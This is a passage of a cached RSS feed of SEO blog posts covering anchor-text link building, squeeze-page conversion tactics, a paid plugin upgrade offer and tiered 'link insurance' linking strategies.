those keywords in the anchor text. This is the advantage of having a blog as you can camouflage your link building tactics under the guise of an informative post. I will just hint at SEO content copy writing here, but you get the gist (link bait, social media, social bookmarking / link building ahem, ahem).</p>\n<p>My suggestion, build 50 links to the page and move on to another term. Then give it a week or two and go back and <a href=\"http://www.nichewatch.com/\">check the status of the keywords</a> and how your allinanchor:, allintitle: and allintext: ratio&#8217;s are performing is contrast to the keyword combinations, make note of your progress and try to find your site in the SERPs again. You can go back to the Google interface and check or you can just scroll through the normal results to see where you stand.</p>\n<p>If the keywords you select are under 20,000 results, if your site has some authority you can take those over from just posting an <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/titles-and-tagging-for-seo-conversion-relevance/\">on topic post that is tagged properly</a> in your blog. But to sustain them, you have to feed the pages keyword combinations to keep them afloat in the SERPs. This also provides a cushion around them to help fend off competition from leap-frogging past you up the ladder.</p>\n<p>Acquisition (climbing the rungs) and defense from others can be done through varying the tactic slightly. Slow down once you have acquired a top 20 and let the link velocity push you up the ladder. Then you can build 1/3 of the links using the exact match terms until you hit the top 10. If you crack the top 10, then go back, add a few more occurrences of the keywords you want to rank for in your document/page. Add a few more links, wait a week and then see if that pushes you over the hump into the top 5.</p>\n<p>This method may seem a bit chaotic, but you get the gist, you can manage one keyword or several at the same time. The key is to use a common denominator as the pivotal term that is used to tie together all of the variations of the word stemmed singular, plural and adjective based keyword combinations until you have effectively saturated each keywords density in the external links to your site.</p>\n<p>You can always check on Google Webmaster tools which keywords have the highest occurrences that are directed at your site. The idea is, to build a base term, add a qualifier, then do this again and again, until all of your main keywords are essentially lodged in the anchor text pointing at your site from a wide variety of unique and Class C- IP addresses.</p>\n<p>For example if you did a search on a term like &#8220;seo professional&#8221; this term returns 126,000 results. If your site has a PR4 for example and you have content that supports this type of industry of jargon in your domain name, on your pages or in your page titles, you should already have some leverage for the term.</p>\n<p>Terms that have slight correlation to your site&#8217;s theme can be optimized, but the rate of which all depends on your website authority, the links you use and how much link juice they carry, where you point them, the competition and how algorithms see your link building techniques (natural or unnatural) if you invoke a penalty, you will not rank for that term for a while until it&#8217;s lifted, so it&#8217;s better not to get greedy and vary your titles, anchor text and pages when deep linking.</p>\n<p>I hope you found this information useful, if you did, then cast your vote to share it, sign up for the RSS feed or just enjoy&#8230;See you in the SERPs.</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=fMke79EeF5s:vRkBGj361aA:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/fMke79EeF5s\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:4;a:13:{s:5:\"title\";s:63:\"How to Get SEO, Call to Action and Conversion on the Same Page!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/WawDDa-5Yn0/\";s:8:\"category\";s:110:\"SEO Marketingcall-to-actionHigher-Sales-ConversionProblem-Solution-MarketingSEO-&-Squeeze-PagesWhat-SEO-is-NOT\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Mon, 01 May 2017 10:02:55 PDT\";s:4:\"guid\";s:120:\"http://www.seodesignsolutions.com/blog/seo-marketing/how-to-get-your-seo-call-to-action-and-conversion-on-the-same-page/\";s:7:\"content\";a:1:{s:7:\"encoded\";s:10528:\"<p><a href=\"http://www.seodesignsolutions.com\">SEO</a> is nice for popularity, but <strong>conversion is even better</strong>. So, before you go out and start snatching up more keywords than you can shake a stick at, make sure your offer is up to the challenge of enlivening customer attention and encouraging viewer retention. Otherwise, your marketing efforts will be a mere exercise in futility.</p>\n<p><a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/how-to-get-your-seo-call-to-action-and-conversion-on-the-same-page/\"><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2007/12/seo-and-conversion.jpg\" alt=\"seo and conversion\" width=\"400\" height=\"265\" class=\"aligncenter size-full wp-image-9645\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2007/12/seo-and-conversion.jpg 400w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2007/12/seo-and-conversion-300x199.jpg 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" /></a></p>\n<p><strong>Are you playing it safe with keyword blinders?, or have you diversified your Search Terms?</strong></p>\n<p>It&#8217;s better to be safe than sorry as a result of <strong>&#8220;having blinders on&#8221;</strong> when it comes to <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/\">search engine optimization</a> and selecting the best keywords for your offer. Instead of thinking in terms of &#8220;the money phrase&#8221;, or, <strong>as soon as I hit the top 10</strong> for &#8220;my ultimate competitive keyword&#8221;, that floodgates of website traffic will open, sales will inundate our sales team and we will have to hire 20 people to scale our sales department to keep up with the surge of orders and traffic. This is not to say that things like this do not happen, they do, but rarely as a result of one keyword alone.<br />\n<span id=\"more-105\"></span></p>\n<p><strong>Don&#8217;t believe keyword hype</strong></p>\n<p>The misconception typically originates as a result of assumption, or misinformation gleaned from data mining tools / keyword research tools (it says this phrase gets 20,000 hits per month, so it must), which is understandable. I can assure you, we have dominated multiple rankings in top 10 competitive keywords with double organic listings, only to be disappointed by the lack of traffic that resulted. Yet, on the other hand, been completely surprised when you write  or optimize something (supposedly less competitive) and experience surges of traffic for weeks from one keyword you may or may not have expected.  </p>\n<p>It is important to be clear <strong>what search engine optimization is not</strong>, in order to know what it truly is. <strong>SEO is not the answer to conversion</strong>, it is just a tool to rouse the masses to investigate your offer, but ultimately the responsibility lies within the realm of the individual or individuals structuring the offer, to determine just what the anticipated end result will be.</p>\n<p><strong>Are your Pages Eye Candy? or do they Own a Focus</strong></p>\n<p>The internet is full of hungry eyes with agile minds attached, so many in fact, that your pages may just be another snack along the way. In order to change the menu and make your site <strong>&#8220;the main course&#8221;</strong>, nine times out of ten, some changes need to occur to make the transition from pages with an idle online existence to a page that for lack of better terms, offers you a deal you can&#8217;t refuse.</p>\n<p><strong>What Can You Learn (and apply to your own site) from a Squeeze Page</strong></p>\n<p><strong>First, the headline</strong> &#8211; <a href=\"http://seodesignsolutions.com/blog/small-business-marketing/action-words-and-conversion/\">Call to Action and Conversion</a> Starts Here. When you look at a typical squeeze page, once you get there, there is no question what the page is about, in fact they make it hard to see anything other than what the topical relevance is when you first set eyes on the page, but why? Because the headline takes up 25% of the screen, is usually in a ridiculously loud color, with quotes and highlighted in yellow. Anyone who fails at that point to surmise what the contextual relevance is for being there, should have their internet license suspended for surfing blind without emotional attachment. </p>\n<p>In any case, the point being, the pages, despite how obnoxious they are serve a very fundamental purpose, which is to set the tone and funnel the reader&#8217;s attention to the meat and potatoes of the document (typically found at the very bottom alongside a pay pal purchase button). This is were the old adage of (A.I.D.A) attention, interest, desire, action comes into play in it&#8217;s sublime simplicity. </p>\n<p><strong>Next, the testimonial</strong>, but why? Because they know you are skeptical and they know they need to subvert your defenses in order to engage the rational mind behind the emotional response when you shop (do I need this or do I want this, can I ignore or suppress the urge to purchase, or am I genuinely interested) all the while thousands of queries such as this race through the subconscious and either lead your to (a) move along (b) read further, since your there or (c) take the plunge and purchase, because, what the hay, it&#8217;s only money right.</p>\n<p><strong>Next, the problem / solution</strong>, which is usually built on the premise of using questions to preface it&#8217;s significance. Are you tired of? &#8220;the problem&#8221; Do you get frustrated when? Now you can be free of, by using our super duper X,Y,Z solution for mere chump change (only $39.95) for the ultimate answer to your prayers. </p>\n<p>O.k, so I was a bit over the top, but I&#8217;m sure it&#8217;s not the first time you have seen this pitch,  purchased or nearly purchased something as a result of it. Most of us are conditioned not to respond to such an overtly obvious pitch, however, I must admit, I am an impulse shopper and randomly purchase e-books in this fashion and never get around to reading them (the ideal customer for squeeze pages).</p>\n<p><strong>Then, the close,</strong> here is where they hit you with information about the product or service with the focus is on the &#8220;how you can benefit&#8221; mentality and inevitably the call to action, ORDER NOW!, ORDER TODAY, ORDER IN THE NEXT 5 MINUTES AND RECEIVE A FREE &#8220;rubber ducky, widget,etc.&#8221;, once again, it&#8217;s all about conversion.</p>\n<p>Sure that page may get 1000 visitors that day, and from that 1000 visitors <strong>100 order</strong>, that is more than enough to offset the other 900 that did not, so you can see the beauty in their plan. Pages like this could teach a great deal to businesses seeking conversion for their efforts instead of just visitors window shopping and burning up bandwidth, and I must admit even our pages in the main site need to take the positive benefits from such a blatant business model. The squeeze page is just that, a page that funnels their attention to a conclusion and then compels them to take action.</p>\n<p><strong>Have you heard of Funneling Attention for Higher Conversions? </strong></p>\n<p>Business models that make money are using the funneling tactic to amass massive amounts of income, using a tried and true / simplistic theme. Even though is mainly has it&#8217;s place in direct sales, affiliate programs, sales for e-books or inexpensive items. I have seen this tactic used for offers in the thousands and still convert readers (it just took more filler in the middle to build the argument and present the solution). Getting back to the basis of this article, the conclusion is SEO does not ensure conversion, it merely sets the stage.</p>\n<p>Branding is one thing, but how many people are online just for the sake of saying &#8221; I am the number one brand for industry X&#8221;, perhaps this is important for corporate America, sure, but,for the rest of us out here trying to make ends meet, we need conversion in some way shape or form.</p>\n<p>Knowing this, instead of thinking narrow when it comes to using SEO, one could opt for a more holistic approach whereby they identify the behavior of the types of clients they would like to attract, thinking of individuals as opposed to demographics from a one dimensional prospective. If you think holistically, you can cover your bases and <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/are-you-google-sighted-or-can-you-see-the-big-picture-of-search/\">optimize entire segments of the niche</a> as well as use multiple tactics and search engines to draw traffic from a variety of queries and implement &#8220;attention and retention insurance&#8221; for all of your respective offers. </p>\n<p>For example, instead of one or two phrases, why not have twenty instead, it essentially takes about the same amount of effort and can be accomplished through modifying slight variations of content and <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/\">how your build links</a>.</p>\n<p>Just having a top 10 ranking does not ensure traffic, simply because, not all keywords convert! It truly is sad to see so many people just scratching the surface for topical relevance, when in reality mosts sites are capable of acquiring heightened depth (for readership) and conversion and could achieve 400% more times the amount of traffic from just applying rudimentary steps to lead people through the &#8220;expected action for that page&#8221;. But, they have to get there first, so my suggestion in a nutshell is, to <strong>optimize root phrases with pertinent keywords</strong> instead of simple &#8220;exact match key phrases&#8221;, use strong internal links to get viewers deeper into the site and use graphics or video&#8217;s to cut the bounce rates in half.</p>\n<p>We will continue along these lines for the next few days and covering topics related to SEO, conversion, structuring your offer and how the way you craft your content, ultimately impacts the bottom line. Stay tuned for the next post&#8230;</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=WawDDa-5Yn0:cNEDoVaKCcc:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/WawDDa-5Yn0\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:491:\"SEO is nice for popularity, but conversion is even better. So, before you go out and start snatching up more keywords than you can shake a stick at, make sure your offer is up to the challenge of enlivening customer attention and encouraging viewer retention. Otherwise, your marketing efforts will be a mere exercise in <a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/how-to-get-your-seo-call-to-action-and-conversion-on-the-same-page/\" class=\"read-more-excerpt\">Read More</a>\";s:3:\"wfw\";a:1:{s:10:\"commentrss\";s:125:\"http://www.seodesignsolutions.com/blog/seo-marketing/how-to-get-your-seo-call-to-action-and-conversion-on-the-same-page/feed/\";}s:5:\"slash\";a:1:{s:8:\"comments\";s:2:\"35\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:120:\"http://www.seodesignsolutions.com/blog/seo-marketing/how-to-get-your-seo-call-to-action-and-conversion-on-the-same-page/\";}s:7:\"summary\";s:491:\"SEO is nice for popularity, but conversion is even better. So, before you go out and start snatching up more keywords than you can shake a stick at, make sure your offer is up to the challenge of enlivening customer attention and encouraging viewer retention. Otherwise, your marketing efforts will be a mere exercise in <a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/how-to-get-your-seo-call-to-action-and-conversion-on-the-same-page/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:10528:\"<p><a href=\"http://www.seodesignsolutions.com\">SEO</a> is nice for popularity, but <strong>conversion is even better</strong>. So, before you go out and start snatching up more keywords than you can shake a stick at, make sure your offer is up to the challenge of enlivening customer attention and encouraging viewer retention. Otherwise, your marketing efforts will be a mere exercise in futility.</p>\n<p><a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/how-to-get-your-seo-call-to-action-and-conversion-on-the-same-page/\"><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2007/12/seo-and-conversion.jpg\" alt=\"seo and conversion\" width=\"400\" height=\"265\" class=\"aligncenter size-full wp-image-9645\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2007/12/seo-and-conversion.jpg 400w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2007/12/seo-and-conversion-300x199.jpg 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" /></a></p>\n<p><strong>Are you playing it safe with keyword blinders?, or have you diversified your Search Terms?</strong></p>\n<p>It&#8217;s better to be safe than sorry as a result of <strong>&#8220;having blinders on&#8221;</strong> when it comes to <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/\">search engine optimization</a> and selecting the best keywords for your offer. Instead of thinking in terms of &#8220;the money phrase&#8221;, or, <strong>as soon as I hit the top 10</strong> for &#8220;my ultimate competitive keyword&#8221;, that floodgates of website traffic will open, sales will inundate our sales team and we will have to hire 20 people to scale our sales department to keep up with the surge of orders and traffic. This is not to say that things like this do not happen, they do, but rarely as a result of one keyword alone.<br />\n<span id=\"more-105\"></span></p>\n<p><strong>Don&#8217;t believe keyword hype</strong></p>\n<p>The misconception typically originates as a result of assumption, or misinformation gleaned from data mining tools / keyword research tools (it says this phrase gets 20,000 hits per month, so it must), which is understandable. I can assure you, we have dominated multiple rankings in top 10 competitive keywords with double organic listings, only to be disappointed by the lack of traffic that resulted. Yet, on the other hand, been completely surprised when you write  or optimize something (supposedly less competitive) and experience surges of traffic for weeks from one keyword you may or may not have expected.  </p>\n<p>It is important to be clear <strong>what search engine optimization is not</strong>, in order to know what it truly is. <strong>SEO is not the answer to conversion</strong>, it is just a tool to rouse the masses to investigate your offer, but ultimately the responsibility lies within the realm of the individual or individuals structuring the offer, to determine just what the anticipated end result will be.</p>\n<p><strong>Are your Pages Eye Candy? or do they Own a Focus</strong></p>\n<p>The internet is full of hungry eyes with agile minds attached, so many in fact, that your pages may just be another snack along the way. In order to change the menu and make your site <strong>&#8220;the main course&#8221;</strong>, nine times out of ten, some changes need to occur to make the transition from pages with an idle online existence to a page that for lack of better terms, offers you a deal you can&#8217;t refuse.</p>\n<p><strong>What Can You Learn (and apply to your own site) from a Squeeze Page</strong></p>\n<p><strong>First, the headline</strong> &#8211; <a href=\"http://seodesignsolutions.com/blog/small-business-marketing/action-words-and-conversion/\">Call to Action and Conversion</a> Starts Here. When you look at a typical squeeze page, once you get there, there is no question what the page is about, in fact they make it hard to see anything other than what the topical relevance is when you first set eyes on the page, but why? Because the headline takes up 25% of the screen, is usually in a ridiculously loud color, with quotes and highlighted in yellow. Anyone who fails at that point to surmise what the contextual relevance is for being there, should have their internet license suspended for surfing blind without emotional attachment. </p>\n<p>In any case, the point being, the pages, despite how obnoxious they are serve a very fundamental purpose, which is to set the tone and funnel the reader&#8217;s attention to the meat and potatoes of the document (typically found at the very bottom alongside a pay pal purchase button). This is were the old adage of (A.I.D.A) attention, interest, desire, action comes into play in it&#8217;s sublime simplicity. </p>\n<p><strong>Next, the testimonial</strong>, but why? Because they know you are skeptical and they know they need to subvert your defenses in order to engage the rational mind behind the emotional response when you shop (do I need this or do I want this, can I ignore or suppress the urge to purchase, or am I genuinely interested) all the while thousands of queries such as this race through the subconscious and either lead your to (a) move along (b) read further, since your there or (c) take the plunge and purchase, because, what the hay, it&#8217;s only money right.</p>\n<p><strong>Next, the problem / solution</strong>, which is usually built on the premise of using questions to preface it&#8217;s significance. Are you tired of? &#8220;the problem&#8221; Do you get frustrated when? Now you can be free of, by using our super duper X,Y,Z solution for mere chump change (only $39.95) for the ultimate answer to your prayers. </p>\n<p>O.k, so I was a bit over the top, but I&#8217;m sure it&#8217;s not the first time you have seen this pitch,  purchased or nearly purchased something as a result of it. Most of us are conditioned not to respond to such an overtly obvious pitch, however, I must admit, I am an impulse shopper and randomly purchase e-books in this fashion and never get around to reading them (the ideal customer for squeeze pages).</p>\n<p><strong>Then, the close,</strong> here is where they hit you with information about the product or service with the focus is on the &#8220;how you can benefit&#8221; mentality and inevitably the call to action, ORDER NOW!, ORDER TODAY, ORDER IN THE NEXT 5 MINUTES AND RECEIVE A FREE &#8220;rubber ducky, widget,etc.&#8221;, once again, it&#8217;s all about conversion.</p>\n<p>Sure that page may get 1000 visitors that day, and from that 1000 visitors <strong>100 order</strong>, that is more than enough to offset the other 900 that did not, so you can see the beauty in their plan. Pages like this could teach a great deal to businesses seeking conversion for their efforts instead of just visitors window shopping and burning up bandwidth, and I must admit even our pages in the main site need to take the positive benefits from such a blatant business model. The squeeze page is just that, a page that funnels their attention to a conclusion and then compels them to take action.</p>\n<p><strong>Have you heard of Funneling Attention for Higher Conversions? </strong></p>\n<p>Business models that make money are using the funneling tactic to amass massive amounts of income, using a tried and true / simplistic theme. Even though is mainly has it&#8217;s place in direct sales, affiliate programs, sales for e-books or inexpensive items. I have seen this tactic used for offers in the thousands and still convert readers (it just took more filler in the middle to build the argument and present the solution). Getting back to the basis of this article, the conclusion is SEO does not ensure conversion, it merely sets the stage.</p>\n<p>Branding is one thing, but how many people are online just for the sake of saying &#8221; I am the number one brand for industry X&#8221;, perhaps this is important for corporate America, sure, but,for the rest of us out here trying to make ends meet, we need conversion in some way shape or form.</p>\n<p>Knowing this, instead of thinking narrow when it comes to using SEO, one could opt for a more holistic approach whereby they identify the behavior of the types of clients they would like to attract, thinking of individuals as opposed to demographics from a one dimensional prospective. If you think holistically, you can cover your bases and <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/are-you-google-sighted-or-can-you-see-the-big-picture-of-search/\">optimize entire segments of the niche</a> as well as use multiple tactics and search engines to draw traffic from a variety of queries and implement &#8220;attention and retention insurance&#8221; for all of your respective offers. </p>\n<p>For example, instead of one or two phrases, why not have twenty instead, it essentially takes about the same amount of effort and can be accomplished through modifying slight variations of content and <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/\">how your build links</a>.</p>\n<p>Just having a top 10 ranking does not ensure traffic, simply because, not all keywords convert! It truly is sad to see so many people just scratching the surface for topical relevance, when in reality mosts sites are capable of acquiring heightened depth (for readership) and conversion and could achieve 400% more times the amount of traffic from just applying rudimentary steps to lead people through the &#8220;expected action for that page&#8221;. But, they have to get there first, so my suggestion in a nutshell is, to <strong>optimize root phrases with pertinent keywords</strong> instead of simple &#8220;exact match key phrases&#8221;, use strong internal links to get viewers deeper into the site and use graphics or video&#8217;s to cut the bounce rates in half.</p>\n<p>We will continue along these lines for the next few days and covering topics related to SEO, conversion, structuring your offer and how the way you craft your content, ultimately impacts the bottom line. Stay tuned for the next post&#8230;</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=WawDDa-5Yn0:cNEDoVaKCcc:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/WawDDa-5Yn0\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:5;a:11:{s:5:\"title\";s:49:\"Don’t Get Left Behind! Upgrade to SEO Ultimate+\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/iOB6cfJihrA/\";s:8:\"category\";s:13:\"WordPress SEO\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Wed, 21 Dec 2016 08:14:50 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9637\";s:7:\"content\";a:1:{s:7:\"encoded\";s:2336:\"<p><img class=\"size-full wp-image-9638 aligncenter\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2016/12/superhero.jpg\" alt=\"Upgrade to SEO Ultimate+\" width=\"604\" height=\"364\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2016/12/superhero.jpg 604w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2016/12/superhero-300x181.jpg 300w\" sizes=\"(max-width: 604px) 100vw, 604px\" /></p>\n<p>Thanks for clicking through to read this important message.</p>\n<p>Well, I’ve got <strong>some good news</strong> and <strong>some bad news</strong>. The good news is, we’ve got an amazing PRO version of <a href=\"http://www.seodesignsolutions.com\">SEO</a> Ultimate called SEO Ultimate+ that we’re going to update and add features to exclusively from this point forward…<br />\nThe bad news is, <strong>this is the last update for the FREE version</strong>, but, here’s the deal.</p>\n<p>We really, really, really love this plugin, but we can’t do both (create new features and support the free, while mutually focusing on the PRO version), so, unfortunately, we’re going to retire the FREE version shortly on January 1st, 2017.</p>\n<p>But, here’s your chance to <a href=\"https://www.seoultimateplus.com/breaking-news\"><strong>get a deep discount of over 40% OFF</strong></a> the regular single license price and get a license for only $29 if you use this link now.</p>\n<p>Don&#8217;t get left behind and have to use 30 plugins to do the same thing (Internal links, schema markup, Open Graph, link masking, permalink rewrites, canonicalization, mass editing meta data for all pages, posts and post types, 404 monitoring) and more&#8230;.</p>\n<p>Upgrade to <a href=\"https://www.seoultimateplus.com/breaking-news\">SEO Ultimate+</a> now and kick off the new year with powerful SEO functionality all streamlined in one robust, feature-rich dashboard.</p>\n<p>Stay tuned.</p>\n<p>Happy Holidays and all the best,</p>\n<p>Jeffrey</p>\n<p>&nbsp;</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=iOB6cfJihrA:LOMpOrWrNEY:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/iOB6cfJihrA\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:462:\"Thanks for clicking through to read this important message. Well, I’ve got some good news and some bad news. The good news is, we’ve got an amazing PRO version of SEO Ultimate called SEO Ultimate+ that we’re going to update and add features to exclusively from this point forward… The bad news is, this is <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/dont-get-left-behind-upgrade-to-seo-ultimate/\" class=\"read-more-excerpt\">Read More</a>\";s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:98:\"http://www.seodesignsolutions.com/blog/wordpress-seo/dont-get-left-behind-upgrade-to-seo-ultimate/\";}s:7:\"summary\";s:462:\"Thanks for clicking through to read this important message. Well, I’ve got some good news and some bad news. The good news is, we’ve got an amazing PRO version of SEO Ultimate called SEO Ultimate+ that we’re going to update and add features to exclusively from this point forward… The bad news is, this is <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/dont-get-left-behind-upgrade-to-seo-ultimate/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:2336:\"<p><img class=\"size-full wp-image-9638 aligncenter\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2016/12/superhero.jpg\" alt=\"Upgrade to SEO Ultimate+\" width=\"604\" height=\"364\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2016/12/superhero.jpg 604w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2016/12/superhero-300x181.jpg 300w\" sizes=\"(max-width: 604px) 100vw, 604px\" /></p>\n<p>Thanks for clicking through to read this important message.</p>\n<p>Well, I’ve got <strong>some good news</strong> and <strong>some bad news</strong>. The good news is, we’ve got an amazing PRO version of <a href=\"http://www.seodesignsolutions.com\">SEO</a> Ultimate called SEO Ultimate+ that we’re going to update and add features to exclusively from this point forward…<br />\nThe bad news is, <strong>this is the last update for the FREE version</strong>, but, here’s the deal.</p>\n<p>We really, really, really love this plugin, but we can’t do both (create new features and support the free, while mutually focusing on the PRO version), so, unfortunately, we’re going to retire the FREE version shortly on January 1st, 2017.</p>\n<p>But, here’s your chance to <a href=\"https://www.seoultimateplus.com/breaking-news\"><strong>get a deep discount of over 40% OFF</strong></a> the regular single license price and get a license for only $29 if you use this link now.</p>\n<p>Don&#8217;t get left behind and have to use 30 plugins to do the same thing (Internal links, schema markup, Open Graph, link masking, permalink rewrites, canonicalization, mass editing meta data for all pages, posts and post types, 404 monitoring) and more&#8230;.</p>\n<p>Upgrade to <a href=\"https://www.seoultimateplus.com/breaking-news\">SEO Ultimate+</a> now and kick off the new year with powerful SEO functionality all streamlined in one robust, feature-rich dashboard.</p>\n<p>Stay tuned.</p>\n<p>Happy Holidays and all the best,</p>\n<p>Jeffrey</p>\n<p>&nbsp;</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=iOB6cfJihrA:LOMpOrWrNEY:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/iOB6cfJihrA\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:6;a:13:{s:5:\"title\";s:49:\"Managing Link Weight and Building Link Insurance!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/SbAgitQy41g/\";s:8:\"category\";s:75:\"Link BuildingBuilding Links to Your LinksLink-InsuranceManaging Link Weight\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Sun, 01 May 2016 07:48:55 PDT\";s:4:\"guid\";s:102:\"http://www.seodesignsolutions.com/blog/link-building/managing-link-weight-and-building-link-insurance/\";s:7:\"content\";a:1:{s:7:\"encoded\";s:5536:\"<p>I Just wanted to share a quick <a href=\"http://www.seodesignsolutions.com\">SEO</a> strategy for <strong>balancing link weight</strong>. Have you ever used a tiered link strategy? Although there may be other names for it, personally, I call this <strong>link insurance</strong> (insurance in the sense that just in case you need it).<br />\n<a href=\"http://www.seodesignsolutions.com/blog/link-building/managing-link-weight-and-building-link-insurance/\"><img class=\"aligncenter wp-image-9603 size-full\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/05/link-weight-link-insurance.jpg\" alt=\"link-weight-link-insurance\" width=\"400\" height=\"346\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/05/link-weight-link-insurance.jpg 400w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/05/link-weight-link-insurance-300x260.jpg 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" /></a></p>\n<p>Since the value of links is all based on the collective support they rally. The stronger the backlink the more value it can pass to your site as far as aiding your pages in maintaining or increasing positioning.<span id=\"more-204\"></span></p>\n<p>If you have ever tagged a site using social bookmarking, then you have scratched the surface. For example social bookmarking utilizes the premise of <strong>link insurance</strong>. Not only is it great to seal the deal with spiders (by getting their attention), but with enough inbound links strategically augmenting a page, it can provide long-term value for the <strong>link-freshness factor</strong> which can keep your internal pages buoyant and moving up in the search engine rankings.</p>\n<p>A stable authority site (built over time with a tremendous amount of link weight) has less chance of losing favor with search engine algorithms. However, what about other transient links, that drop off, get buried over time or the site architecture from the site offering the link is so taxed that by the time the pages are spidered <strong>they are tapped out</strong> as far as their real value is concerned? What is a viable solution to revive potential rankings?</p>\n<p><strong>The Solution: Building links to your links as insurance</strong></p>\n<p>I am not suggesting to abuse this tactic, what I am insinuating is, maintaining a stable influx of link juice into a site benefits all of the pages in that site (as long as you distribute the inbound links in moderation). The premise here is, <a href=\"http://seodesignsolutions.com/blog/link-building/balancing-link-diversity-link-velocity-and-link-volume/\">balancing</a> the ratios of content development to inbound links (and their various anchor and modifiers) along with systemic deep linking is the cornerstone of relevance of <a href=\"http://seodesignsolutions.com/blog/seo-basics/seo-basics-using-allinanchor-allintitle-allintext/\">SEO basics</a> in action.</p>\n<p>Links also can have more internal value from a page that was recently promoted in the Google algorithm. For example, if a page went from a page rank of zero to a PR2 or PR3 page in one update, if it gets indexed regularly and is succinctly tied to the sites main navigation, then you have an authority link right under your nose you can use to augment your main keywords as you wish.</p>\n<p>You can always review such content an amend it for a common goal. Ten links from <a href=\"http://seodesignsolutions.com/blog/link-building/using-deep-links-to-summon-search-engine-spiders/\">strong internal pages</a> to a sub folder or page buried deep in the site can change the landscape of a page or sites SEO value. Combining this with the fact that you can point new links from those pages at older links (to keep them fresh) or use them to kick off new content with a splash, the possibilities for recycling your sites internal link dynamo is promising.</p>\n<p><strong>One Example of the Equation:</strong></p>\n<p><strong>1)</strong> Find a slouching ranking and determine a keyword you want to invigorate<br />\n<strong>2)</strong> use a site:yourdomainname.com keyword (command) to find the most relevant page in your site<br />\n<strong>3)</strong> Build a new page using the <strong>main keyword in the title and text</strong><br />\n<strong>4)</strong> Link to the new page from the old page (with page rank) using the (keyword) as the anchor text / link text<br />\n 